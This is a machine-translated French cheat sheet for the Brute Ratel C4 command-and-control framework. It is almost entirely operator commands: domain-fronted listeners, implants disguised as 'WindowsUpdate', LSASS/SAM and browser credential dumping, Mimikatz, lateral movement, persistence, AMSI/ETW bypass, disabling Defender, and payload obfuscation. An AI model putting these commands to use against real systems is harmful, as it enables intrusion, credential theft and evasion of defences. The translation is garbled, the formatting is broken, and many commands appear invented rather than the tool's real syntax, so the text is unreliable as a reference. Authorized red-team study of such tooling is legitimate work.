Aller au contenu

Brute Ratel C4 Cadre Feuille de chaleur

Copier toutes les commandes Générer PDF

Aperçu général

Brute Ratel C4 (BRc4) est un cadre commercial personnalisé de commande et de contrôle (C2) conçu pour les opérations de l'équipe rouge et les simulations adverses. Il offre des capacités d'évasion avancées, des caractéristiques de post-exploitation sophistiquées et une sécurité opérationnelle professionnelle.

C'est pas vrai. Attention: Il s'agit d'un outil commercial nécessitant une licence valide. Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.

Installation

Activation des licences

# Activate license (requires valid license key)
./brc4 --activate <license-key>

# Verify license status
./brc4 --license-info

# Update license
./brc4 --update-license

Configuration du serveur

# Start BRc4 server
./brc4 --server

# Start with custom configuration
./brc4 --server --config /path/to/config.json

# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443
```_

### Connexion client
```bash
# Connect to server
./brc4 --client --server 192.168.1.100:443

# Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token <token>
```_

## Référence de commande

### Gestion des serveurs
|Command|Description|
|---------|-------------|
|`help`|Display help menu|
|`version`|Show version information|
|`listeners`|List active listeners|
|`badgers`|List connected badgers (agents)|
|`operators`|List connected operators|
|`exit`|Exit BRc4 server|

### Gestion de l'auditeur
|Command|Description|
|---------|-------------|
|`listener http`|Create HTTP listener|
|`listener https`|Create HTTPS listener|
|`listener dns`|Create DNS listener|
|`listener tcp`|Create TCP listener|
|`listener smb`|Create SMB listener|
|`listener stop <id>`|Stop listener|

### Gestion du blaireau (agent)
|Command|Description|
|---------|-------------|
|`badger <id>`|Interact with badger|
|`badger kill <id>`|Kill badger|
|`badger sleep <time>`|Set sleep interval|
|`badger jitter <percentage>`|Set jitter percentage|
|`badger proxy <proxy>`|Set proxy for badger|

## Configuration de l'auditeur

### HTTP/HTTPS Auditeurs
```bash
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start

# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
start

DNS Auditeur

# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
start

SMB Auditeur

# Create SMB listener
listener smb
set pipename msagent_pipe
set host 0.0.0.0
set port 445
start

TCP Auditeur

# Create TCP listener
listener tcp
set host 0.0.0.0
set port 4444
set bind true
start

Génération de blaireaux

Badgers Windows

# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate

# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate

# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generate

Badgers Linux

# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate

# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generate

blaireaux macOS

# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate

# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generate

Commandements post-exploitation

Informations sur le système

# Get system information
sysinfo

# Get current user
whoami

# Get privileges
getprivs

# Get environment variables
env

# Get network interfaces
ifconfig

Opérations de fichiers

# List directory
ls /path/to/directory

# Change directory
cd /path/to/directory

# Download file
download /remote/path/file.txt

# Upload file
upload /local/path/file.txt /remote/path/

# Execute file
execute /path/to/executable

# Delete file
rm /path/to/file

Gestion des processus

# List processes
ps

# Kill process
kill <pid>

# Migrate to process
migrate <pid>

# Inject into process
inject <pid> <payload>

# Create process
spawn <executable>

Opérations réseau

# Network connections
netstat

# ARP table
arp

# Routing table
route

# Port scan
portscan 192.168.1.0/24 80,443,3389

# Ping sweep
ping 192.168.1.0/24

Caractéristiques avancées

Profils C2 malléables

# Load malleable profile
set malleable /path/to/profile.profile

# Custom HTTP profile
http-get \\\\{
    set uri "/api/v1/status";
    client \\\\{
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
        header "Accept" "application/json";
    \\\\}
    server \\\\{
        header "Content-Type" "application/json";
        output \\\\{
            print;
        \\\\}
    \\\\}
\\\\}

Techniques d'injection de procédé

# Classic DLL injection
inject-dll <pid> /path/to/dll.dll

# Process hollowing
hollow <target-process> <payload>

# Reflective DLL loading
reflective-dll /path/to/dll.dll

# Manual DLL mapping
map-dll <pid> /path/to/dll.dll

# Thread hijacking
hijack-thread <pid> <payload>

Récolte crédible

# Dump LSASS
lsass-dump

# Mimikatz integration
mimikatz sekurlsa::logonpasswords

# SAM dump
sam-dump

# LSA secrets
lsa-secrets

# Cached credentials
cache-dump

# Browser credentials
browser-creds

Mouvement latéral

# WMI execution
wmi-exec 192.168.1.10 "whoami"

# PSExec
psexec 192.168.1.10 "whoami"

# SMB execution
smb-exec 192.168.1.10 "whoami"

# DCOM execution
dcom-exec 192.168.1.10 "whoami"

# WinRM execution
winrm-exec 192.168.1.10 "whoami"

Mécanismes de persistance

# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"

# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily

# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"

# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"

# Startup folder
persist-startup "C:\temp\badger.exe"

Techniques d'évacuation

Anti-analyse

# VM detection
vm-detect

# Sandbox evasion
sandbox-evasion

# Debugger detection
debugger-detect

# Sleep evasion
sleep-evasion 300

# User interaction check
user-interaction

Dépassement AMSI/ETW

# AMSI bypass
amsi-bypass

# ETW bypass
etw-bypass

# Disable Windows Defender
disable-defender

# Unhook DLLs
unhook-dlls

# Patch AMSI
patch-amsi

Obfuscation de la circulation

# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com

# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"

# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"

Obfuscation de la charge utile

# Encrypt payload
encrypt-payload aes256 <key>

# Obfuscate strings
obfuscate-strings

# Pack executable
pack-exe upx

# Sign executable
sign-exe /path/to/cert.pfx

# Polymorphic generation
polymorphic-gen

Sécurité opérationnelle

Sécurité des communications

# Use encrypted channels
set encryption aes256

# Certificate pinning
set cert-pinning true

# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384

# Jitter configuration
set jitter 20
set jitter-type random

Gestion des infrastructures

# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443

# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"

# Failover configuration
set failover-servers "backup1.com,backup2.com"

Exploitation forestière et surveillance

# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log

# Operator tracking
set operator-logging true

# Command auditing
set command-audit true

# Session recording
set session-recording true

Opérations des équipes

Support multi-opérateurs

# Add operator
operator add username password

# Set operator permissions
operator permissions username read,write,execute

# Operator sessions
operator sessions

# Kick operator
operator kick username

Caractéristiques de la collaboration

# Share badger session
share-session <badger-id> <operator>

# Session notes
note-add "Important finding"
note-list
note-delete <note-id>

# Team chat
chat "Message to team"
chat-history

Dépannage

Problèmes de connexion

# Test listener
test-listener <listener-id>

# Check connectivity
test-connectivity <target>

# Verify certificates
verify-cert /path/to/cert.pem

# Debug mode
set debug true

Numéros de blaireau

# Badger health check
health-check <badger-id>

# Reset badger
reset-badger <badger-id>

# Badger diagnostics
diagnostics <badger-id>

# Force reconnect
reconnect <badger-id>

Optimisation des performances

# Optimize sleep intervals
set sleep-optimization true

# Bandwidth throttling
set bandwidth-limit 1024

# Connection pooling
set connection-pooling true

# Compression
set compression gzip

Configuration

Configuration du serveur

\\\\{
  "server": \\\\{
    "host": "0.0.0.0",
    "port": 443,
    "ssl": true,
    "cert": "/path/to/cert.pem",
    "key": "/path/to/key.pem"
  \\\\},
  "database": \\\\{
    "type": "sqlite",
    "path": "/opt/brc4/database.db"
  \\\\},
  "logging": \\\\{
    "level": "info",
    "file": "/var/log/brc4.log"
  \\\\}
\\\\}

Profil malléable

# Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";

http-get \\\\{
    set uri "/api/status";
    client \\\\{
        header "Accept" "application/json";
        header "Accept-Language" "en-US,en;q=0.9";
    \\\\}
    server \\\\{
        header "Content-Type" "application/json";
        output \\\\{
            print;
        \\\\}
    \\\\}
\\\\}

Ressources

  • [Bruit Ratel C4 Site officiel] (LINK_4)
  • [Documentation BRC4] (LINK_4)
  • [Guide des opérations de l'équipe rouge] (LINK_4)
  • [Profils C2 portatifs] (LINK_4)

*Cette feuille de triche fournit une référence complète pour l'utilisation de Brute Ratel C4. Il s'agit d'un outil commercial qui exige une licence adéquate. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *